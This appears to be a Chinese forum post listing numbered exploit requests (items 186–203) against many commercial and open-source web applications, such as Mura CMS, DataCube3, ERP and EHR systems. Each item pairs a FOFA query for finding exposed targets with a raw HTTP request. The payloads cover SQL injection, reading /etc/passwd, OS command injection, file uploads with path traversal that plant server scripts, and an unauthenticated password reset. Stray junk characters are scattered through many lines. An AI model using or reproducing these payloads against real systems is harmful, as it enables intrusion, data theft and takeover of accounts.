% H- J; G& x' v5 X8 r4 f o( x1 UCVE-2024-317502 v9 D" d( Q9 L, V, Q; x
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统. Y7 H6 u8 G U' H
FOFA:title=="DataCube3"8 d2 g( H+ d! p7 O8 C# X' w- ]
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1- S& _5 X; u D3 o9 M4 w
Host: your-ip/ p& ?& c& O9 s6 T' d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
8 U6 Z K/ p2 |3 m' o6 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8/ R4 G; D+ w, A$ j% B( X/ L9 i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# }2 a5 R) H7 _( O( O1 R! j; NAccept-Encoding: gzip, deflate
$ Y; g/ d' M) k6 @- Y9 YConnection: close: u4 E/ D& E: F, K7 Q' B) }4 k* t
Content-Type: application/x-www-form-urlencoded
# }! N# h. G9 i2 J9 L6 \+ @7 G/ @5 F' V1 Q1 K
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450; `3 ]" q0 A- f- y
$ g/ [5 ?# O" r! `4 ^" b
( G; k# Q' N( t9 x$ e4 \# _* T
187. Mura CMS processAsyncObject SQL注入
) G" P' \ I- mCVE-2024-32640! D/ k4 u) \* i: V/ z5 X
FOFA:"Mura CMS"# u1 N; L/ \/ P6 W" j8 F
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1" f! t5 M0 e* T/ `4 D
Host: your-ip0 Y! M6 Z* i' K2 U3 r
Content-Type: application/x-www-form-urlencoded( V9 @7 ^. S; A" h0 J. O# d
& d9 z+ Z) P* f& x- s, [9 c5 Q2 p7 I; r
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1+ {! Y/ _- e( X# g; K
, H) q/ k# j: v! [$ V1 z" Z$ X( Z
+ W/ O! M. ~. Z( d188. 叁体-佳会视频会议 attachment 任意文件读取9 ]$ {% }( @$ f4 H/ Y3 U+ W" q
version <= 3.9.7
, [ N# ]* E# C+ zFOFA:body="/system/get_rtc_user_defined_info?site_id"
3 r( H$ p1 A& w" s0 bGET /attachment?file=/etc/passwd HTTP/1.1
# H H* e8 Z6 ]5 C( eHost: your-ip8 w" W$ @$ [/ k( A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 g3 S w! l1 L6 q6 o j+ B6 f7 a5 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# z- |% h- l9 ?) L* z
Accept-Encoding: gzip, deflate
# ]) W. l$ Z# Q/ FAccept-Language: zh-CN,zh;q=0.9,en;q=0.89 {0 x y, ]. U$ L) N
Connection: close# Z+ {4 T8 q2 W
9 C$ i0 |" S$ Y/ K' f( \
4 y. V) J6 L ]2 A# k; j0 n4 o; }$ a
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
$ [& \$ W4 V, z1 H+ Q8 cFOFA:app="LANWON-临床浏览系统"4 l. o: u2 m9 k0 B
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1$ f3 j6 ]% ? M1 A6 l
Host: your-ip
% \# C% B* l3 E- E8 DUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! \: G* T }% C- ]7 C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 ^# P) G9 X7 e' A. A2 S+ \
Accept-Encoding: gzip, deflate
: R; O5 S1 u: H) D3 o( bAccept-Language: zh-CN,zh;q=0.9' R, b7 w2 c4 \- \
Connection: close
C+ Q( ?4 A1 E7 i3 T1 b" g6 \) K$ ~9 Q- j' y- _
3 y/ j2 B) n5 a- ^* y! t# K r' [190. 短视频矩阵营销系统 poihuoqu 任意文件读取" `5 i% {$ ~" a; y9 L& o
FOFA:title=="短视频矩阵营销系统"
# ^9 k& A0 U) F! }! ~. WPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
* V) J8 ~3 s! q1 v0 J/ S z# K- CHost: your-ip
4 @1 y6 P4 Y! V1 b8 E1 m+ TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+ ^, m, Z" q& t3 a/ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.93 N6 D2 i+ K1 [
Content-Type: application/x-www-form-urlencoded
]: O7 F, i! b5 IAccept-Encoding: gzip, deflate
" e6 K0 x' r- z5 ?% g& c- FAccept-Language: zh-CN,zh;q=0.9
9 n) V, }. s! I
6 A0 @) B0 [4 Epoi=file:///etc/passwd
2 S* n7 |7 d$ I4 @5 m8 Q: m5 h
( x) R, J2 Z6 v+ B& @
! ^% R- A8 L* b- r' o% g191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入6 t: y$ G' B: q% [( ~( J5 k( x
FOFA:body="/CDGServer3/index.jsp"
- V( @% M" E+ |8 ]POST /CDGServer3/js/../NavigationAjax HTTP/1.14 h! W$ X" K: p7 V0 |
Host: your-ip+ G- u% z6 m6 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 Y" l5 s+ T8 J5 p% G4 x% qContent-Type: application/x-www-form-urlencoded
. Y. S7 D" J, R! p# r* y
/ _: a8 t$ T5 y$ T: ~1 Pcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=1 V& g9 f1 }" P; m$ o, b1 M
3 k( W+ a+ K8 ]9 J1 w
2 @& B) T7 x& n; r, V; M192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
( _% g. l" W) {" G' u& wFOFA:title="用户登录_富通天下外贸ERP"8 B; w8 C9 U1 S: k9 H
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
2 t& s3 `& W0 n) i9 {/ THost: your-ip
I0 f+ ]8 z' h5 p/ S1 L$ K; UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
; D0 K+ h: r" VContent-Type: application/x-www-form-urlencoded8 l, S/ T: B# \' }4 a: |- U
2 P' M5 j5 V# V5 e" u( O
7 a& y: a& D! P6 a& o5 Y" Q<% @ webhandler language="C#" class="AverageHandler" %>( K' r& b1 g, @, W
using System;
6 @8 M' a2 o' i1 Uusing System.Web;
0 x$ ^ Y. q: k* n. c9 n! Y5 ppublic class AverageHandler : IHttpHandler
9 ~$ T1 t, f2 v{5 J* l. B8 d4 j6 ?9 l, z
public bool IsReusable( |! x, J5 A$ i3 k( m/ T0 L
{ get { return true; } }( C$ y. b7 X% U- O* N) G$ q8 ^3 j
public void ProcessRequest(HttpContext ctx)
& ]7 T0 j3 G4 j7 J6 l{
3 [. g' h( }! n$ `6 S3 Actx.Response.Write("test");
/ u- R# a% k; Z}+ Y" ^& P9 L0 S; w/ i& \
}1 W$ X' p. k0 ^- F
z d: d0 B, i& Z6 ^
* c: K* N) J+ z7 q) d% Q2 R9 \/ q
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
2 v: H0 W8 P$ A( ^FOFA:body="山石云鉴主机安全管理系统"6 Q3 x/ W ~+ Q* V
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
; A1 j" \2 f6 e2 c M# cHost:
0 x/ a' \+ x0 o% g$ O% O$ ?Cookie: PHPSESSID=2333333333333;- h3 O6 Y- m& V
Content-Type: application/x-www-form-urlencoded
7 M9 k1 ~( B& l: q4 W) g: U4 `8 b" XUser-Agent: Mozilla/5.0! N0 _! S5 Y: R) w& Z/ A
; X1 p* N4 `: n0 m, q! s' n
4 H' w* E* a5 s- qPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1 g; q, _( O: c! j _3 H
Host:
4 Q2 p. @; d$ `. OUser-Agent: Mozilla/5.0( P# i' S2 `- g% s& ^2 j/ e
Accept-Encoding: gzip, deflate. w3 k! W* ?1 f& ~7 k
Accept: */*2 X9 t, O m8 }. L$ y, a6 Q5 D
Connection: close
) ]1 _/ O8 [1 G% xCookie: PHPSESSID=2333333333333;
1 t* _5 ~# f. N7 R- a7 bContent-Type: application/x-www-form-urlencoded9 r$ g' } Q! D' ?2 O o$ ]
Content-Length: 84
. t; B# s; @7 @
1 z- l% |( ^; f0 Y( Mparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
6 k) X- W5 m0 }1 b$ W9 I( a% ~+ K" |5 ~
1 h% v0 i, Z! z3 X5 J- _$ ^' u
GET /master/img/config HTTP/1.1
5 e. B: `/ Z* H& t8 X$ T; X! ?- MHost:+ ?6 r+ L0 @# ~) q5 G, r
User-Agent: Mozilla/5.0. n* c, U8 a( v- w* s1 d: v& ]
4 q( c/ b3 ~& P" J7 j! j- {+ K" j6 O7 o
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传$ A) v. O, d) t& i! M
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
' g& W, j C8 Z8 _1 k* W4 H! k
POST /servlet/uploadAttachmentServlet HTTP/1.1
A3 G0 E& P& mHost: host* G1 p( z3 Y. B! }. |$ H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 L p/ }4 I5 s+ A- ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ M+ D( ?. A. A* K; S6 L! AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- @; i9 V3 F+ A$ dAccept-Encoding: gzip, deflate
y7 P, d2 K/ T% I& z. N rConnection: close
8 u' R' w- H' A/ E9 w+ V9 l0 o& R+ uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk0 @; I/ J) B& e6 y# c
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 M* t T% [3 W& q+ x& @+ H8 M# g# h1 g( n6 e) A; c7 [
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp". s0 t/ b' B. e* _& @, _
Content-Type: text/plain
# |& ?# T, O/ p8 J% V6 w<% out.println("hello");%>
! J2 m+ u1 \, O, V: q4 B* L------WebKitFormBoundaryKNt0t4vBe8cX9rZk8 b: g& ?6 x1 Y# _
Content-Disposition: form-data; name="json"" W! Y( H$ h0 U
{"iq":{"query":{"UpdateType":"mail"}}}2 W1 K t9 c. R i; x* |" k: |
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
; M" a2 R" X& C5 n
, _# x% Q8 H0 V3 t
( ]0 B6 y4 A8 C195. 飞鱼星上网行为管理系统 send_order.cgi命令执行- c3 m% w t o/ f, O, x
FOFA:title=="飞鱼星企业级智能上网行为管理系统; ^/ F8 D2 r- d5 V* J H
POST /send_order.cgi?parameter=operation HTTP/1.1$ l2 t" {9 k* m* _; Z
Host: 127.0.0.1
3 t' u+ n& D2 I$ x: c+ M) j, oPragma: no-cache; a- H8 j# P5 h+ O
Cache-Control: no-cache
& N& s8 e- u3 W" yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 ?5 K% z' B7 j! C! M" h' PAccept: */*4 f5 f& s. m( A* N
Accept-Encoding: gzip, deflate
7 }6 E7 ~. o( ?' f( i, O& Y8 WAccept-Language: zh-CN,zh;q=0.93 @0 {( H- v7 u! \
Connection: close8 x" n- k& [3 U- }6 Y2 v* Y
Content-Type: application/x-www-form-urlencoded
: r' j* y) j6 x0 `' j) BContent-Length: 68
! G+ G: L" N; [0 W+ A2 D" g% A! _# |6 o+ \: u( C- Z
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
/ ~, \3 |! ]% N% [* ~
4 z! t4 P! j8 o/ G
7 b- p+ ]4 t z! G' F196. 河南省风速科技统一认证平台密码重置
9 Y: A, z" _2 j0 QFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
) B) s4 b# }$ jPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1# |" T2 i7 K5 V) m C3 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
0 p7 f. V* ~' fContent-Type: application/json;charset=UTF-8( O6 u; L; e6 u# k
X-Requested-With: XMLHttpRequest
$ b+ Z4 m! u8 YHost:
$ I' F( U/ D4 Z( t' i, w& XAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.20 ` j. o6 }) ~; r
Content-Length: 45
5 v$ D( a1 t2 g, b7 E- E5 [Connection: close
8 l# i9 F" M$ {7 a$ t4 W4 k9 P8 }( D/ U4 ?$ S
{"xgh":"test","newPass":"test666","email":""}
/ J8 [# m- `0 }/ z) q' I) O& P! s6 P$ L n$ F
3 l7 C3 x) q" B# a
6 q( l* A* h$ Z197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
5 @. [5 X( p& S/ \FOFA:app="浙大恩特客户资源管理系统": A; J5 A+ }3 i. w3 K2 g
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1( S$ J( h& O1 R# i9 l" z9 ^' A
Host:. z: J1 m$ b$ v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
: c1 j% s' N! B$ \; ?' cAccept-Encoding: gzip, deflate; j+ Y, ], {' Y" w' I, G
Connection: close
1 t2 U' F5 ^0 d0 }7 T, C: o! V6 M' l0 G: [+ C# z
0 q( ?/ ^9 j" g" {/ Q [
5 a0 _4 A! V6 N198. 阿里云盘 WebDAV 命令注入/ B- P- r+ K- m: P
CVE-2024-29640$ m9 {( M$ l% A3 c) e4 Z9 G5 ^& C
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1! C6 K2 i# X2 N' Z
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf649 o% y; Q# O, g! B7 `3 [8 y
Accept: */*
6 d: `3 X9 \: A3 n1 U7 RAccept-Encoding: gzip, deflate& q, [7 t6 \, ?8 p0 G. T
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.60 b. a7 Q9 @4 n
Connection: close
4 D% e; C7 Z# S7 v8 o1 x
; A7 A. I2 V# T% c# R) D, ~7 a' ?; O$ |
199. cockpit系统assetsmanager_upload接口 文件上传
3 ^; p" [. f3 w6 d1 I# Y
, u& y8 o" q; ~2 B( J1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:8 Q" E- A) o! o! H, I
GET /auth/login?to=/ HTTP/1.1- }2 M4 b# x1 l. E
9 p; e/ L6 `- B1 F" ~5 e响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
D9 }+ Y7 l8 V0 v/ f; i9 V+ S0 M9 \9 |* }, U
2.使用刚才上一步获取到的jwt获取cookie:" y7 d$ c6 Y, |% _4 v. U0 m
( L) u2 `" X/ C8 E
POST /auth/check HTTP/1.1
2 }2 h; G! v; C7 EContent-Type: application/json
* C# N" l$ O( t0 _+ t4 |- P. {, t4 ^$ E I& w+ r
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"} a5 m+ Z. \7 C
3 b7 H) P& {0 Y5 c响应:200,返回值:( A) p; J- p0 x8 G/ p
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=// O5 Y/ w6 b' f6 t
Fofa:title="Authenticate Please!": Q0 L& d& A8 p3 p% ?" B9 y. f' R; N
POST /assetsmanager/upload HTTP/1.1/ k$ P# Z5 ]+ Y* B: V% C4 a) o
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3. i) T' O2 V6 [. b5 p# S1 ]% C
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
+ {' i+ h' @; T9 H% E9 N( m( |5 |& p* l# `( t$ D4 J
-----------------------------36D28FBc36bd6feE7Fb3
7 i& B0 Q v" q/ s" I2 ^Content-Disposition: form-data; name="files[]"; filename="tttt.php"" o. E8 B& b4 t1 T: q
Content-Type: text/php
8 Q W, r( ^$ {( z g$ n, [0 P, j) \$ m
<?php echo "tttt";unlink(__FILE__);?> A# o+ J" ~, S) d
-----------------------------36D28FBc36bd6feE7Fb30 ?6 c$ R) V" U
Content-Disposition: form-data; name="folder"2 N0 E+ A5 u; j+ Q. u$ ]
) ~7 U0 r' {" N; s6 w" g/ h' o
-----------------------------36D28FBc36bd6feE7Fb3--
+ I' f: E2 k5 Y( `1 b6 m. R1 R
* x p* B' U, z C: V# ]! |3 w7 r/ ?9 w5 P. O
/storage/uploads/tttt.php2 u; J6 F9 [, v4 N9 P, ]. _' M
2 S* d7 F: Z6 D2 \4 Y B, E
200. SeaCMS海洋影视管理系统dmku SQL注入, q% O5 `; U! E; L
FOFA:app="海洋CMS"
( F2 H+ M m1 G% c/ S; WGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
/ J, i" Q2 A6 m) W' p) f1 `) ?Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
/ H) d! m6 r. x- rUpgrade-Insecure-Requests: 1
2 y6 j8 Y+ [' l! tCache-Control: max-age=0
, J; A/ q1 S5 F& KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# O$ U! E5 @( k- n( }- ZAccept-Encoding: gzip, deflate
9 y% A; l1 Y; D: E, HAccept-Language: zh-CN,zh;q=0.9: O" ]- E5 T+ H! q0 G3 K7 C
, X1 q) o' B# d- e2 I4 }
; ^! B0 Z1 v2 d: r0 Z201. 方正全媒体新闻采编系统 binary SQL注入
5 K0 |6 E) q) M- N6 C! qFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
" M: B: L: l4 G6 u1 w# l* }POST /newsedit/newsplan/task/binary.do HTTP/1.1
" ^& a+ d: _: A% L8 \) XContent-Type: application/x-www-form-urlencoded1 m; A9 h- c. c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, y: G) @/ r* oAccept-Encoding: gzip, deflate2 F6 Y3 H( ?! \+ H' f5 V
Accept-Language: zh-CN,zh;q=0.9
/ ^7 m- Z8 y/ Z3 Q% O: AConnection: close
! |1 x, h) k$ M# L2 ]
* z5 ~8 c, w& U# kTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1! k5 O8 B5 T% Z/ A
. K }9 Z$ }4 F6 q' f9 b# j5 |5 r
' E, ?! _% C: }202. 微擎系统 AccountEdit任意文件上传! s0 y& s6 \/ L( @! R- Y% c, g4 ~) [
FOFA:body="/Widgets/WidgetCollection/"
* q8 k* K# Y8 ]" @( j9 D" P3 R0 h获取__VIEWSTATE和__EVENTVALIDATION值- q5 \, |( W! e
GET /User/AccountEdit.aspx HTTP/1.13 L- o5 U A* ]6 p3 O
Host: 滑板人之家% w1 P; N* Z+ w c k4 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31: r- q: G& U6 L" q/ O# N4 G0 O q
Content-Length: 0; K/ j7 H6 b4 `* ]- B
/ _0 a0 H* V% F: }' D1 F2 U3 L' w9 }* T( c
替换__VIEWSTATE和__EVENTVALIDATION值' [- X( H! ^6 V$ |( Y3 y! ]$ i
POST /User/AccountEdit.aspx HTTP/1.1
& Y* t. D E/ u1 W( }4 vAccept-Encoding: gzip, deflate, br) Y5 h& q& T0 J3 l/ ~1 x/ [
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
. ?4 j6 M! w- u" z3 J5 [+ j$ {! X7 }: }! E! W- ^; t
-----------------------------786435874t38587593865736587346567358735687
+ X; O1 s U, K d' j: OContent-Disposition: form-data; name="__VIEWSTATE"% B V2 K+ B4 u0 f! [8 E) ^
0 K; K3 `, y3 @- ~- P5 L3 K
__VIEWSTATE
6 Z& A; m# I9 F; [-----------------------------786435874t38587593865736587346567358735687
! P5 S3 V3 {- |, ~, oContent-Disposition: form-data; name="__EVENTVALIDATION"/ ~4 P' ?. b9 [0 {* h0 o
+ @/ w( g) {+ p) ~1 h6 O' c2 }__EVENTVALIDATION' X0 H: \; B1 V
-----------------------------786435874t38587593865736587346567358735687
, N7 X& Z9 ^- M: L$ H/ \# ?Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
. R& S) v+ }$ a6 Q/ UContent-Type: text/plain
d5 J/ k8 { l
( i* i& F3 T# U" z9 R* x% gHello World!! r4 y7 L. @0 l/ [5 J. p
-----------------------------786435874t38587593865736587346567358735687
2 q! [9 g, Z I1 LContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"7 A ^& L' x/ z. {; r
: X1 O( k) L0 k, V ~; c上传图片* O5 J% m$ h c6 T
-----------------------------786435874t385875938657365873465673587356879 x+ P* M7 n b+ j3 T* T
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
% u% t- _* c4 y. ]
u$ g. N# E/ F5 M0 b) t% y
; z4 m) W) Y) p/ B# A+ n-----------------------------786435874t38587593865736587346567358735687
2 O4 _& G) X/ M7 f( f' MContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
. a Z2 ?) g# [3 W
( \! y; g" \9 u+ A" I1 V- f+ c( K, g* o* D
-----------------------------786435874t38587593865736587346567358735687--
( e* G) p* W7 S8 G) J) V3 T- G" g3 l: I* M
' z" u- o% a2 Y5 k0 I0 R4 G/_data/Uploads/1123.txt
& Y0 B; V& \7 l* S1 D
* \2 k9 b5 Z+ a6 K4 Z4 j6 i2 l203. 红海云EHR PtFjk 文件上传
) O5 ]. E$ {4 c, ]% QFOFA:body="RedseaPlatform"
: x$ I l) J$ ^) a" xPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1$ g! e# G6 {6 a
Host: x.x.x.x
: L/ `8 G) C! L! x/ YAccept-Encoding: gzip
! v6 l1 B4 Q2 i- }% ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 W/ S5 q+ \- H+ p4 z0 T9 I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4" |0 E( `. y$ Q# T! \/ k3 G# H" A
Content-Length: 210
& i6 z% w3 f6 u3 a
: }8 [/ }2 i/ q3 d- o- q------WebKitFormBoundaryt7WbDl1tXogoZys4$ A) O0 T+ ^. w+ h) m
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
9 n; `! ^; c# b9 U/ UContent-Type:image/jpeg
2 a0 |) I) M0 s4 z8 v) ^0 q. _" s6 b" {9 L3 ~9 {
<% out.print("hello,eHR");%>
8 e# Y+ v4 W$ m y------WebKitFormBoundaryt7WbDl1tXogoZys4--& d. j7 ]- z2 ?* }7 k
1 g! W0 [% Q$ _" y6 { M' y& Q y & W U9 c6 D3 Y
7 ]; U+ H0 t& y! j+ ~
9 r. w% x! q, x2 i+ j
3 @$ K( T4 e! J
5 S3 P+ a* z2 V, u/ z8 G |
发表于 2024-6-5 14:31:29
收藏
支持
反对